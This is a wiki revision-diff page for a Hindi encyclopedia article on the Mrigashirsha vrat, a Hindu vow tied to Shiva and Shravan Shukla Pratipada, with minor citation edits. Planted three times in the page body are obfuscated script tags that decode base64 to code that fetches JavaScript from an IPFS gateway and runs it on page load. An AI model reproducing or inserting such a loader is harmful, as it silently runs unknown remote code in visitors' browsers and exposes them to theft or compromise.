Difference between revisions of "मृगशीर्ष व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (मृगशीर्षव्रत का नाम बदलकर मृगशीर्ष व्रत कर दिया गया है)
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[श्रावण माह|श्रावण]] के [[शुक्ल पक्ष]] की [[प्रतिपदा]] पर [[शिव]] ने तीन फलकों के एक बाण से हरिण का रूप धारण किये हुए [[यज्ञ]] के तीन मुखों को भेदा था।  
 
*[[श्रावण माह|श्रावण]] के [[शुक्ल पक्ष]] की [[प्रतिपदा]] पर [[शिव]] ने तीन फलकों के एक बाण से हरिण का रूप धारण किये हुए [[यज्ञ]] के तीन मुखों को भेदा था।  
*कर्ता को मिट्टी से मृगशीर्ष की प्रतिमा बना कर तरकारियों एवं सरसों से युक्त आटे के विभिन्न नैवेद्य से पूजा करनी चाहिए<ref> हेमाद्रि (व्रत0 1, 358-359)</ref>; <ref>स्मृतिकौस्तुभ (146)</ref>
+
*कर्ता को मिट्टी से मृगशीर्ष की प्रतिमा बना कर तरकारियों एवं सरसों से युक्त आटे के विभिन्न नैवेद्य से पूजा करनी चाहिए।<ref> हेमाद्रि (व्रतखण्ड 1, 358-359)</ref>; <ref>स्मृतिकौस्तुभ (146)</ref>
 
 
 
 
  
 
+
{{लेख प्रगति
{{लेख प्रगति|आधार=आधार1
+
|आधार=आधार1
 
|प्रारम्भिक=
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|माध्यमिक=

Revision as of 05:02, 11 September 2010

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullakhit hindoo dharm ka ek vrat sanskar hai.
  • shravan ke shukl paksh ki pratipada par shiv ne tin phalakoan ke ek ban se harin ka roop dharan kiye hue yajn ke tin mukhoan ko bheda tha.
  • karta ko mitti se mrigashirsh ki pratima bana kar tarakariyoan evan sarasoan se yukt ate ke vibhinn naivedy se pooja karani chahie.[1]; [2]

 


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vratakhand 1, 358-359)
  2. smritikaustubh (146)

sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>